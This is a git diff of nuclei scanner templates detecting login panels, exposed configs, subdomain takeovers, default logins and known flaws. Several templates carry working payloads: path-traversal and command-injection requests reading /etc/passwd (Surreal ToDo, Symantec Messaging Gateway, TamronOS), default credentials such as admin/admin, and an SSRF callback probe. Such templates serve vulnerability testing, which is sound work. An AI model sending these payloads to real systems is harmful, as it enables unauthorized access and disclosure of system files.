    Redirecting...' + - type: word + part: header + words: + - 'session' + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/supervpn-panel-10575.yaml b/nuclei-templates/Other/supervpn-panel-10575.yaml new file mode 100644 index 0000000000..7b42b90a1d --- /dev/null +++ b/nuclei-templates/Other/supervpn-panel-10575.yaml @@ -0,0 +1,15 @@ +id: supervpn-detect +info: + name: SuperVPN panel detect + author: organiccrap + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/admin/login.html" + matchers: + - type: word + words: + - "Sign In-SuperVPN" + part: body diff --git a/nuclei-templates/Other/supervpn-panel-10577.yaml b/nuclei-templates/Other/supervpn-panel-10577.yaml deleted file mode 100644 index ef939f6a7f..0000000000 --- a/nuclei-templates/Other/supervpn-panel-10577.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: supervpn-detect - -info: - name: SuperVPN panel detect - author: organiccrap - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/admin/login.html" - matchers: - - type: word - words: - - "Sign In-SuperVPN" - part: body diff --git a/nuclei-templates/Other/surrealtodo-lfi-10580.yaml b/nuclei-templates/Other/surrealtodo-lfi-10580.yaml new file mode 100644 index 0000000000..9f9b943213 --- /dev/null +++ b/nuclei-templates/Other/surrealtodo-lfi-10580.yaml @@ -0,0 +1,35 @@ +id: surrealtodo-lfi + +info: + name: Surreal ToDo 0.6.1.2 - Local File Inclusion + author: arafatansari + severity: high + description: | + Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter. + reference: + - https://www.exploit-db.com/exploits/45826 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + verified: true + max-request: 1 + tags: surreal,lfi,edb + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# digest: 4a0a004730450220683fa7236b09c5ee7b7d946f0560bd8ef35205b71befd76a10c9efafbda7f148022100d5bf6d4b171a2517636646c6caac00760d530205221d83fa4debe34712dfe5b6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/surrealtodo-lfi.yaml b/nuclei-templates/Other/surrealtodo-lfi.yaml deleted file mode 100644 index b91a15d98b..0000000000 --- a/nuclei-templates/Other/surrealtodo-lfi.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: surrealtodo-lfi -info: - name: Surreal ToDo 0.6.1.2 - Local File Inclusion - author: arafatansari - severity: high - description: | - Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter. - reference: - - https://www.exploit-db.com/exploits/45826 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - verified: true - tags: surreal,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/nuclei-templates/Other/swagger-api-10592.yaml b/nuclei-templates/Other/swagger-api-10592.yaml new file mode 100644 index 0000000000..b7d499e8a8 --- /dev/null +++ b/nuclei-templates/Other/swagger-api-10592.yaml @@ -0,0 +1,68 @@ +id: swagger-api + +info: + name: Public Swagger API + author: pdteam + severity: info + tags: exposure,api,swagger + +requests: + - method: GET + path: + - "{{BaseURL}}/swagger/ui/index" + - "{{BaseURL}}/swagger/index.html" + - "{{BaseURL}}/swagger-ui.html" + - "{{BaseURL}}/swagger/swagger-ui.html" + - "{{BaseURL}}/api/swagger-ui.html" + - "{{BaseURL}}/api-docs/swagger.json" + - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/swagger.json" + - "{{BaseURL}}/swagger.yaml" + - "{{BaseURL}}/swagger/v1/swagger.json" + - "{{BaseURL}}/swagger/v1/swagger.yaml" + - "{{BaseURL}}/api/index.html" + - "{{BaseURL}}/api/docs/" + - "{{BaseURL}}/api/swagger.json" + - "{{BaseURL}}/api/swagger.yaml" + - "{{BaseURL}}/api/swagger.yml" + - "{{BaseURL}}/api/swagger/index.html" + - "{{BaseURL}}/api/swagger/swagger-ui.html" + - "{{BaseURL}}/api/api-docs/swagger.json" + - "{{BaseURL}}/api/api-docs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/swagger.json" + - "{{BaseURL}}/api/swagger-ui/swagger.yaml" + - "{{BaseURL}}/api/apidocs/swagger.json" + - "{{BaseURL}}/api/apidocs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/api-docs" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/apidocs" + - "{{BaseURL}}/api/swagger" + - "{{BaseURL}}/api/swagger/static/index.html" + - "{{BaseURL}}/api/swagger-resources" + - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/__swagger__/" + - "{{BaseURL}}/api/_swagger_/" + - "{{BaseURL}}/api/spec/swagger.json" + - "{{BaseURL}}/api/spec/swagger.yaml" + - "{{BaseURL}}/api/swagger/ui/index" + - "{{BaseURL}}/__swagger__/" + - "{{BaseURL}}/_swagger_/" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" + - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "swagger:" + - "Swagger 2.0" + - "\"swagger\":" + - "Swagger UI" + - "**token**:" + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/swagger-api-10593.yaml b/nuclei-templates/Other/swagger-api-10593.yaml deleted file mode 100644 index 285df562ab..0000000000 --- a/nuclei-templates/Other/swagger-api-10593.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: swagger-api - -info: - name: Public Swagger API - author: pdteam - severity: info - tags: exposure,api,swagger - -requests: - - method: GET - path: - - "{{BaseURL}}/reporting/swagger/index.html" - - matchers-condition: and - matchers: - - type: word - words: - - "swagger:" - - "Swagger 2.0" - - "\"swagger\":" - - "Swagger UI" - - "**token**:" - condition: or - - - type: status - status: - - 200 - diff --git a/nuclei-templates/Other/symantec-dlp-login.yaml b/nuclei-templates/Other/symantec-dlp-login-10598.yaml similarity index 100% rename from nuclei-templates/Other/symantec-dlp-login.yaml rename to nuclei-templates/Other/symantec-dlp-login-10598.yaml diff --git a/nuclei-templates/Other/symantec-epm-login-10601.yaml b/nuclei-templates/Other/symantec-epm-login-10601.yaml new file mode 100644 index 0000000000..1b2e0addd9 --- /dev/null +++ b/nuclei-templates/Other/symantec-epm-login-10601.yaml @@ -0,0 +1,20 @@ +id: symantec-epm-login +info: + name: Symantec Endpoint Protection Manager + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 + tags: symantec,panel,login +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Endpoint Protection Manager" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/symantec-epm-login-10602.yaml b/nuclei-templates/Other/symantec-epm-login-10602.yaml deleted file mode 100644 index 7b94dcb967..0000000000 --- a/nuclei-templates/Other/symantec-epm-login-10602.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: symantec-epm-login -info: - name: Symantec Endpoint Protection Manager - author: princechaddha - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Symantec+Endpoint+Protection+Manager%22 - tags: symantec,panel,login -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - "Symantec Endpoint Protection Manager" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/symantec-ewep-login-10603.yaml b/nuclei-templates/Other/symantec-ewep-login-10603.yaml deleted file mode 100644 index bf1d69c06b..0000000000 --- a/nuclei-templates/Other/symantec-ewep-login-10603.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: symantec-ewep-login - -info: - name: Symantec Encryption Web Email Protection - author: johnk3r - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 - tags: panel,symantec,login - -requests: - - method: GET - path: - - "{{BaseURL}}/b/l.e" - - matchers-condition: and - matchers: - - type: word - words: - - "Symantec Encryption Server: Web Email Protection - Login" - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/symantec-ewep-login.yaml b/nuclei-templates/Other/symantec-ewep-login.yaml new file mode 100644 index 0000000000..f0f9fafaa1 --- /dev/null +++ b/nuclei-templates/Other/symantec-ewep-login.yaml @@ -0,0 +1,21 @@ +id: symantec-ewep-login +info: + name: Symantec Encryption Web Email Protection + author: johnk3r + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22 + tags: panel,symantec,login +requests: + - method: GET + path: + - "{{BaseURL}}/b/l.e" + matchers-condition: and + matchers: + - type: word + words: + - "Symantec Encryption Server: Web Email Protection - Login" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/symantec-messaging-gateway-10609.yaml b/nuclei-templates/Other/symantec-messaging-gateway-10609.yaml new file mode 100644 index 0000000000..72a8c40af6 --- /dev/null +++ b/nuclei-templates/Other/symantec-messaging-gateway-10609.yaml @@ -0,0 +1,19 @@ +id: symantec-messaging-gateway +info: + name: Symantec Messaging Gateway LFI + author: Random-Robbie + severity: medium + description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal + tags: lfi +requests: + - method: GET + path: + - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" + matchers-condition: and + matchers: + - type: word + words: + - "struts-default.xml" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/symantec-messaging-gateway.yaml b/nuclei-templates/Other/symantec-messaging-gateway.yaml deleted file mode 100644 index 5cd1c1094e..0000000000 --- a/nuclei-templates/Other/symantec-messaging-gateway.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: symantec-messaging-gateway - -info: - name: Symantec Messaging Gateway LFI - author: Random-Robbie - severity: medium - description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" - - matchers-condition: and - matchers: - - type: word - words: - - "struts-default.xml" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/symantec-pgp-global-directory-10613.yaml b/nuclei-templates/Other/symantec-pgp-global-directory-10613.yaml new file mode 100644 index 0000000000..15f11d8c65 --- /dev/null +++ b/nuclei-templates/Other/symantec-pgp-global-directory-10613.yaml @@ -0,0 +1,24 @@ +id: symantec-pgp-global-directory + +info: + name: Symantec PGP Global Directory + author: princechaddha + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 + tags: symantec,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/vkd/GetWelcomeScreen.event' + + matchers-condition: and + matchers: + - type: word + words: + - "PGP Global Directory" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/symantec-pgp-global-directory.yaml b/nuclei-templates/Other/symantec-pgp-global-directory.yaml deleted file mode 100644 index e6a725063e..0000000000 --- a/nuclei-templates/Other/symantec-pgp-global-directory.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: symantec-pgp-global-directory -info: - name: Symantec PGP Global Directory - author: princechaddha - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22PGP+Global+Directory%22 - tags: symantec,panel -requests: - - method: GET - path: - - '{{BaseURL}}/vkd/GetWelcomeScreen.event' - matchers-condition: and - matchers: - - type: word - words: - - "PGP Global Directory" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/symfony-database-config-10615.yaml b/nuclei-templates/Other/symfony-database-config-10615.yaml new file mode 100644 index 0000000000..24f49f54ff --- /dev/null +++ b/nuclei-templates/Other/symfony-database-config-10615.yaml @@ -0,0 +1,17 @@ +id: symfony-database-config +info: + name: Symfony Database Configuration Exposure + author: pdteam + severity: high + tags: config,exposure +requests: + - method: GET + path: + - "{{BaseURL}}/config/databases.yml" + matchers: + - type: word + words: + - "class:" + - "param:" + condition: and + part: body diff --git a/nuclei-templates/Other/symfony-database-config.yaml b/nuclei-templates/Other/symfony-database-config.yaml deleted file mode 100644 index cd509df228..0000000000 --- a/nuclei-templates/Other/symfony-database-config.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: symfony-database-config -info: - name: Symfony Database Configuration Exposure - author: pdteam,geeknik - severity: high - tags: config,exposure,symfony -requests: - - method: GET - path: - - "{{BaseURL}}/config/databases.yml" - matchers-condition: and - matchers: - - type: word - part: header - words: - - "text/html" - negative: true - - type: status - status: - - 200 - - type: word - words: - - "class:" - - "param:" - condition: and - part: body diff --git a/nuclei-templates/Other/symfony-debugmode-10618.yaml b/nuclei-templates/Other/symfony-debugmode-10620.yaml similarity index 100% rename from nuclei-templates/Other/symfony-debugmode-10618.yaml rename to nuclei-templates/Other/symfony-debugmode-10620.yaml diff --git a/nuclei-templates/Other/synology-web-station-10631.yaml b/nuclei-templates/Other/synology-web-station-10631.yaml deleted file mode 100644 index 8bde0932a3..0000000000 --- a/nuclei-templates/Other/synology-web-station-10631.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: synology-web-station - -info: - name: Synology Web Station - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7125 - tags: tech,synology - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Hello! Welcome to Synology Web Station!' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/synology-web-station-10632.yaml b/nuclei-templates/Other/synology-web-station-10632.yaml new file mode 100644 index 0000000000..a592c99a3d --- /dev/null +++ b/nuclei-templates/Other/synology-web-station-10632.yaml @@ -0,0 +1,20 @@ +id: synology-web-station +info: + name: Synology Web Station + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/7125 + tags: tech,synology +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'Hello! Welcome to Synology Web Station!' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/szhe-default-login-10635.yaml b/nuclei-templates/Other/szhe-default-login-10635.yaml deleted file mode 100644 index 64f4525692..0000000000 --- a/nuclei-templates/Other/szhe-default-login-10635.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: szhe-default-login -info: - name: Szhe Default Login - author: pikpikcu - severity: low - tags: szhe,default-login - reference: - - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage -requests: - - raw: - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - email={{username}}&password={{password}}&remeber=true - payloads: - username: - - springbird@qq.com - password: - - springbird - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - 'You should be redirected automatically to target URL: /' - - type: word - words: - - 'Set-Cookie: session' - part: header - - type: status - status: - - 302 diff --git a/nuclei-templates/Other/szhe-default-login.yaml b/nuclei-templates/Other/szhe-default-login.yaml new file mode 100644 index 0000000000..261f6d9060 --- /dev/null +++ b/nuclei-templates/Other/szhe-default-login.yaml @@ -0,0 +1,42 @@ +id: szhe-default-login +info: + name: Szhe Default Login + author: pikpikcu + description: Szhe default login information was discovered. + severity: medium + tags: szhe,default-login + reference: + - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + email={{username}}&password={{password}}&remeber=true + payloads: + username: + - springbird@qq.com + password: + - springbird + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - 'You should be redirected automatically to target URL: /' + - type: word + words: + - 'Set-Cookie: session' + part: header + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/nuclei-templates/Other/tableau-panel-10642.yaml b/nuclei-templates/Other/tableau-panel-10642.yaml new file mode 100644 index 0000000000..35cfa8ccbf --- /dev/null +++ b/nuclei-templates/Other/tableau-panel-10642.yaml @@ -0,0 +1,25 @@ +id: tableau-panel + +info: + name: Tableau Python Server Default Page Detect + author: pussycat0x + severity: info + metadata: + fofa-dork: 'app="Tableau-Python-Server"' + tags: tableau,panel,python + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Tableau Python Server' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/tableau-panel.yaml b/nuclei-templates/Other/tableau-panel.yaml deleted file mode 100644 index 148f3d6b3e..0000000000 --- a/nuclei-templates/Other/tableau-panel.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: tableau-panel - -info: - name: Tableau Python Server Default Page Detect - author: pussycat0x - severity: info - metadata: - fofa-dork: 'app="Tableau-Python-Server"' - tags: tableau,panel,python - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Tableau Python Server' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/tabnabbing-check-10646.yaml b/nuclei-templates/Other/tabnabbing-check-10644.yaml similarity index 100% rename from nuclei-templates/Other/tabnabbing-check-10646.yaml rename to nuclei-templates/Other/tabnabbing-check-10644.yaml diff --git a/nuclei-templates/Other/tamronos-rce-10650.yaml b/nuclei-templates/Other/tamronos-rce-10650.yaml new file mode 100644 index 0000000000..9a9e405787 --- /dev/null +++ b/nuclei-templates/Other/tamronos-rce-10650.yaml @@ -0,0 +1,19 @@ +id: tamronos-rce +info: + name: TamronOS IPTV/VOD RCE + author: pikpikcu + severity: critical + reference: https://twitter.com/sec715/status/1405336456923471874 + tags: tamronos,rce +requests: + - method: GET + path: + - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/tamronos-rce-10651.yaml b/nuclei-templates/Other/tamronos-rce-10651.yaml deleted file mode 100644 index a93a66e05d..0000000000 --- a/nuclei-templates/Other/tamronos-rce-10651.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: tamronos-rce -info: - name: TamronOS IPTV/VOD - Remote Command Execution - author: pikpikcu - severity: critical - description: | - TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint. - reference: - - https://twitter.com/sec715/status/1405336456923471874 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-78 - metadata: - verified: true - shodan-query: title:"TamronOS IPTV系统" - fofa-query: title="TamronOS IPTV系统" - tags: tamronos,rce -requests: - - method: GET - path: - - "{{BaseURL}}/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 - -# Enhanced by cs on 2022/05/13 diff --git a/nuclei-templates/Other/targa-camera-lfi-10655.yaml b/nuclei-templates/Other/targa-camera-lfi-10654.yaml similarity index 100% rename from nuclei-templates/Other/targa-camera-lfi-10655.yaml rename to nuclei-templates/Other/targa-camera-lfi-10654.yaml diff --git a/nuclei-templates/Other/targa-camera-ssrf-10658.yaml b/nuclei-templates/Other/targa-camera-ssrf-10658.yaml index 3e96a4bd3a..c9c406325c 100644 --- a/nuclei-templates/Other/targa-camera-ssrf-10658.yaml +++ b/nuclei-templates/Other/targa-camera-ssrf-10658.yaml @@ -1,5 +1,4 @@ id: targa-camera-ssrf - info: name: Selea Targa IP OCR-ANPR Camera - Unauthenticated SSRF author: gy741 @@ -7,7 +6,6 @@ info: description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php tags: targa,ssrf,oast,iot,camera,selea - requests: - raw: - | @@ -17,7 +15,6 @@ requests: Accept: */* {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://{{interactsh-url}}","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} - matchers: - type: word part: interactsh_protocol diff --git a/nuclei-templates/Other/tave-takeover-10660.yaml b/nuclei-templates/Other/tave-takeover-10660.yaml new file mode 100644 index 0000000000..d8348e8cc0 --- /dev/null +++ b/nuclei-templates/Other/tave-takeover-10660.yaml @@ -0,0 +1,15 @@ +id: tave-takeover +info: + name: tave takeover detection + author: pdteam + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - "

    Error 404: Page Not Found

    " diff --git a/nuclei-templates/Other/tave-takeover.yaml b/nuclei-templates/Other/tave-takeover.yaml deleted file mode 100644 index 856340b2cf..0000000000 --- a/nuclei-templates/Other/tave-takeover.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: tave-takeover - -info: - name: tave takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "

    Error 404: Page Not Found

    " \ No newline at end of file diff --git a/nuclei-templates/Other/tcpconfig-10666.yaml b/nuclei-templates/Other/tcpconfig-10666.yaml deleted file mode 100644 index 1d10585e6b..0000000000 --- a/nuclei-templates/Other/tcpconfig-10666.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: tcpconfig -info: - name: TCP Config Information Exposed - author: dhiyaneshDK - severity: low - reference: https://www.exploit-db.com/ghdb/6782 - tags: logs,config -requests: - - method: GET - path: - - "{{BaseURL}}/tcpconfig.html" - matchers-condition: and - matchers: - - type: word - words: - - "TCP/IP Configuration" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/tcpconfig.yaml b/nuclei-templates/Other/tcpconfig.yaml new file mode 100644 index 0000000000..86551f4593 --- /dev/null +++ b/nuclei-templates/Other/tcpconfig.yaml @@ -0,0 +1,20 @@ +id: tcpconfig +info: + name: TCP Config Information Exposed + author: dhiyaneshDK + severity: low + reference: + - https://www.exploit-db.com/ghdb/6782 + tags: logs,config +requests: + - method: GET + path: + - "{{BaseURL}}/tcpconfig.html" + matchers-condition: and + matchers: + - type: word + words: + - "TCP/IP Configuration" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/teamwork-takeover-10668.yaml b/nuclei-templates/Other/teamwork-takeover-10668.yaml new file mode 100644 index 0000000000..e442c12019 --- /dev/null +++ b/nuclei-templates/Other/teamwork-takeover-10668.yaml @@ -0,0 +1,15 @@ +id: teamwork-takeover +info: + name: teamwork takeover detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Oops - We didn't find your site. diff --git a/nuclei-templates/Other/teamwork-takeover-10671.yaml b/nuclei-templates/Other/teamwork-takeover-10671.yaml deleted file mode 100644 index b6539997f5..0000000000 --- a/nuclei-templates/Other/teamwork-takeover-10671.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: teamwork-takeover -info: - name: teamwork takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Oops - We didn't find your site. diff --git a/nuclei-templates/Other/tech-detect.yaml b/nuclei-templates/Other/tech-detect-10676.yaml similarity index 100% rename from nuclei-templates/Other/tech-detect.yaml rename to nuclei-templates/Other/tech-detect-10676.yaml diff --git a/nuclei-templates/Other/tectuus-scada-monitor-10682.yaml b/nuclei-templates/Other/tectuus-scada-monitor-10683.yaml similarity index 100% rename from nuclei-templates/Other/tectuus-scada-monitor-10682.yaml rename to nuclei-templates/Other/tectuus-scada-monitor-10683.yaml diff --git a/nuclei-templates/Other/tekon-info-leak-10684.yaml b/nuclei-templates/Other/tekon-info-leak-10684.yaml new file mode 100644 index 0000000000..fc7b1e616e --- /dev/null +++ b/nuclei-templates/Other/tekon-info-leak-10684.yaml @@ -0,0 +1,31 @@ +id: tekon-info-leak +info: + name: Tekon - Unauthenticated Log Leak + author: gy741 + severity: low + description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device + reference: + - https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38 + metadata: + shodan-query: title:"контроллер" + tags: tekon,exposure,unauth +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/log.cgi' + max-size: 2048 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "-- Logs begin at" + - "end at" + condition: and + - type: word + part: header + words: + - "text/plain" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/tekon-info-leak-10685.yaml b/nuclei-templates/Other/tekon-info-leak-10685.yaml deleted file mode 100644 index 5d699abcf5..0000000000 --- a/nuclei-templates/Other/tekon-info-leak-10685.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: tekon-info-leak -info: - name: Tekon - Unauthenticated Log Leak - author: gy741 - severity: low - description: A vulnerability in Tekon allows remote unauthenticated users to disclose the Log of the remote device - reference: https://medium.com/@bertinjoseb/post-auth-rce-based-in-malicious-lua-plugin-script-upload-scada-controllers-located-in-russia-57044425ac38 - metadata: - shodan-query: title:"контроллер" - tags: tekon,exposure,unauth -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/log.cgi' - max-size: 2048 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "-- Logs begin at" - - "end at" - condition: and - - type: word - part: header - words: - - "text/plain" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/telecom-gateway-default-login-10686.yaml b/nuclei-templates/Other/telecom-gateway-default-login-10686.yaml deleted file mode 100644 index 73abc6eada..0000000000 --- a/nuclei-templates/Other/telecom-gateway-default-login-10686.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: telecom-gateway-default-login - -info: - name: Telecom Gateway - Default Admin Login - author: ritikchaddha - severity: high - description: Telecom Gateway default admin login credentials were successful. - metadata: - max-request: 1 - tags: default-login,telecom,gateway - -http: - - raw: - - | - POST /manager/login.php HTTP/1.1 - Host: {{Hostname}} - - Name={{username}}&Pass={{password}} - - attack: pitchfork - payloads: - username: - - admin - password: - - admin - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "电信网关服务器管理后台" - - "index-shang.php" - - "di.php" - condition: and - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/telecom-gateway-default-login.yaml b/nuclei-templates/Other/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..d0730e1ba5 --- /dev/null +++ b/nuclei-templates/Other/telecom-gateway-default-login.yaml @@ -0,0 +1,33 @@ +id: telecom-gateway-default-login +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway +requests: + - raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/telerik-dialoghandler-detect-10688.yaml b/nuclei-templates/Other/telerik-dialoghandler-detect-10688.yaml deleted file mode 100644 index cb6b8d2c9f..0000000000 --- a/nuclei-templates/Other/telerik-dialoghandler-detect-10688.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: telerik-dialoghandler-detect -info: - name: Detect Telerik Web UI Dialog Handler - author: organiccrap,zhenwarx,nielsing - severity: info - reference: - - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html - - https://github.com/bao7uo/dp_crypto - tags: telerik,asp -requests: - - method: GET - path: - - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1' - - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1' - - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1' - - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1' - - 